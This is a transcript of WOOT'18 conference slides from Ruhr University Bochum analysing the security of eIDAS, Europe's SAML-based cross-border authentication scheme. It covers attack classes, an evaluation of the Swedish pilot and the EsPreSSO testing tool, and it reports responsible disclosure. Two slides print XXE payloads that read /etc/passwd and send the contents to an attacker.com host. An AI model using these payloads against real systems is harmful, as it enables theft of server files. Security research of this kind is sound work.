Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services...
Transcript of Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services...
![Page 1: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/1.jpg)
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe
Nils Engelbertz, Nurullah Erinola, David Herring, Juraj Somorovsky, Vladislav Mladenov, Jörg Schwenk
Ruhr University Bochum
![Page 2: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/2.jpg)
Electronic Identification (eID) Services
• Strong authentication with eIDcards
• Usage in public and private sector
• Tax, health, education, …
• Since the early 2000s
• Problem: interoperability
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 2
![Page 3: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/3.jpg)
eIDAS
• electronic IDentification, Authentication, and Trust Services
• Interoperability framework
• Supports cross-country authentication
• Main standard: SAML
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 3
![Page 4: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/4.jpg)
Our Work
• Security of eIDAS authentication services• Systematization of knowledge regarding relevant attacks• Comprehensive penetration test• Responsible disclosure
•Prototype tool support
•Part of the project
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 4
![Page 5: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/5.jpg)
1. SAML
2. eIDAS
3. Attacks
• XML Parsing Attacks
• Evaluation
4. EsPreSSO
5. Conclusions
Overview
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 5
![Page 6: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/6.jpg)
SAML-based Single Sign-On
Identity ProviderService Provider
1. Start Authentication
2. Start Authentication: SAMLRequest
3. Authentication
4. Authentication Token: SAMLResponse
5. Ressources
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 6
![Page 7: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/7.jpg)
<saml:Response>
<saml:Assertion ID="456">
<saml:Issuer>GermanIdP.com</saml:Issuer>
<saml:Subject>
<saml:NameID>[email protected]</saml:NameID>
</saml:Subject>
<saml:Conditions
NotBefore="2018-03-21T14:42:00Z"
NotOnOrAfter="2018-03-21T14:47:00Z">
<saml:AudienceRestriction>
<saml:Audience>GermanSP.com</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<ds:Signature Reference="456">
</ds:Signature>
</saml:Assertion>
</saml:Response>
Assertion
Subject
Issuer
NameID
Conditions
Audience
GermanIdP
Bob
GermanSP
SAML Authentication TokenResponse
Signature
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 7
![Page 8: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/8.jpg)
1. SAML
2. eIDAS
3. Attacks
• XML Parsing Attacks
• Evaluation
4. EsPreSSO
5. Conclusions
Overview
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 8
![Page 9: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/9.jpg)
Overview of eID Services
9
Country SAML OpenID OpenID Connect Other
Austria Yes OAuth
Belgium Yes
Bulgaria Yes Yes
Czech Republic
Denmark Yes (eIDAS) NemID
Estonia
Finland Yes (eIDAS) Yes
France Yes
Georgia No (eIDAS planned) No (obsolete) No
Germany Yes No* SOAP
Netherlands Yes
Norway Yes
Portugal Yes
Sweden Yes
United Kingdom Yes No No SAML (Attribute Query)
eIDAS Yes
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18
https://github.com/RUB-NDS/FutureTrust/wiki
![Page 10: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/10.jpg)
eIDAS Authentication
• Each country has its own eIDauthentication mechanisms
• Huge differences between these lead to incompatibility• Different architecture
• Different protocols
• Different parameters
• eIDAS provides a bridge making cross-country eID authentication possible
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 10
![Page 11: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/11.jpg)
eIDAS Authentication
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 11
Identity ProviderService Provider
![Page 12: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/12.jpg)
eIDAS Authentication
Identity ProviderService Provider
eIDASNode
eIDASNode
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 12
![Page 13: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/13.jpg)
Identity ProviderService Provider
eIDAS Node eIDAS Node
1. Start Authentication
2. Start Authentication: SAMLRequest1
3. Start Authentication: SAMLRequest2
4. Start Authentication: SAMLRequest3
5. Authentication
6. Authentication Token: SAMLResponse1
7. Authentication Token: SAMLResponse2
8. Authentication Token: SAMLResponse3
9. Ressources
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 13
![Page 14: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/14.jpg)
1. SAML
2. eIDAS
3. Attacks
• XML Parsing Attacks
• Evaluation
4. EsPreSSO
5. Conclusions
Overview
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 14
![Page 15: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/15.jpg)
eIDAS Authentication
Identity ProviderService Provider
eIDASNode
eIDASNode
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 19
![Page 16: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/16.jpg)
eIDAS Authentication
Identity ProviderService Provider
eIDASNode
eIDASNode
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 20
![Page 17: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/17.jpg)
SAML Evaluation [Mainka et al., 2014]
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 21
![Page 18: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/18.jpg)
Attacks Summary
Signature Exclusion
Certificate Faking
XML External Entity XSLT Attack
Replay Attacks Recipient Confusion
Signature Wrapping Certificate Injection ACS Spoofing
Open Redirect Covert Redirect Cross-site-scripting
CSRF Attacks Insecure HTTP Session Insecure TLS Session
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 22
![Page 19: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/19.jpg)
1. SAML
2. eIDAS
3. Attacks
• XML Parsing Attacks
• Evaluation
4. EsPreSSO
5. Conclusions
Overview
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 23
![Page 20: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/20.jpg)
Evaluation of XML Parsing Attacks
• No valid ID cards needed
• Serious attacks; Facebook rewarded with 33,500 $
24
![Page 21: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/21.jpg)
XML Entities
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 25
<?xml version="1.0"?><!DOCTYPE [
<!ENTITY res „HI “>]><data>&res;</data>
The parser first„registers“ the entitieswithin the DOCTYPE
XML Code (example)
![Page 22: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/22.jpg)
XML Entities
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 26
<?xml version="1.0"?><!DOCTYPE [
<!ENTITY res „HI “>]><data>&res;</data> The parser determines
the reference to an ENTITY
XML Code (example)
![Page 23: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/23.jpg)
XML Entities
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 27
<?xml version="1.0"?><!DOCTYPE [
<!ENTITY res „HI “>]><data>HI</data>
… and resolves it
XML Code (example)
![Page 24: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/24.jpg)
XML Entities
Are XML Entities
dangerous?
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 28
![Page 25: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/25.jpg)
XML Entities
Illegitimate
File Access with XXE
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 34
![Page 26: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/26.jpg)
Illegitimate File Access
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 35
<?xml version="1.0"?><!DOCTYPE [
<!ENTITY file SYSTEM „/etc/passwd“>]><data>&file;</data>
XML Code (example)
![Page 27: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/27.jpg)
Illegitimate File Access
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 36
<?xml version="1.0"?><!DOCTYPE [
<!ENTITY file SYSTEM „/etc/passwd“><!ENTITY send SYSTEM „http://attacker.com/?f=&file;“>
]><data>&send;</data>
XML Code (example)
![Page 28: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/28.jpg)
1. SAML
2. eIDAS
3. Attacks
• XML Parsing Attacks
• Evaluation
4. EsPreSSO
5. Conclusions
Overview
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 37
![Page 29: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/29.jpg)
Evaluation
38
![Page 30: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/30.jpg)
Comprehensive Evaluation of the eIDASSwedish Pilot
• Offers demo services
• Possible to analyze further attacks like XML Signature Wrapping or XSS, etc.
• No further vulnerabilities found
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 39
![Page 31: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/31.jpg)
1. SAML
2. eIDAS
3. Attacks
• XML Parsing Attacks
• Evaluation
4. EsPreSSO
5. Conclusions
Overview
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 40
![Page 32: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/32.jpg)
Automatic Evaluation with EsPreSSO
• Burp Suite extension
• Extension for Processing and Recognition of Single Sign-On Protocols
• We implemented XXE and Signature Wrapping attacks for SAML
• XML Encryption attacks planed
41
![Page 33: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/33.jpg)
>> 42
![Page 34: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/34.jpg)
1. SAML
2. eIDAS
3. Attacks
• XML Parsing Attacks
• Evaluation
4. EsPreSSO
5. Conclusions
Overview
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 43
![Page 35: Security Analysis of eIDAS – The Cross-Country ... · Electronic Identification (eID) Services •Strong authentication with eID cards •Usage in public and private sector •Tax,](https://reader033.fdocuments.net/reader033/viewer/2022050600/5fa73ea38f8bb84463725010/html5/thumbnails/35.jpg)
Conclusion
• XXE is still a problem
• Many critical vulnerabilities are already fixed
• Our contributions• Best Current Practices for eIDAS
• Automated tool for the security analysis of SAML
• More information• https://github.com/RUB-NDS/FutureTrust/wiki
• https://github.com/RUB-NDS/BurpSSOExtension
• https://www.futuretrust.eu/Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 44